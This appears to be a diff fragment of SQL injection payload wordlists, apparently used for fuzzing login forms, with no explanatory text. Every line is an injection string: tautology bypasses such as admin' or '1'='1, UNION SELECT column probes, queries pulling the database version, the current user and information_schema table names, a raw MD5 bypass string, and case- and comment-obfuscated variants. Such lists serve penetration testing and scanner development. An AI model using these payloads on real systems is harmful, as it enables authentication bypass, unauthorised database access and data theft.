||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
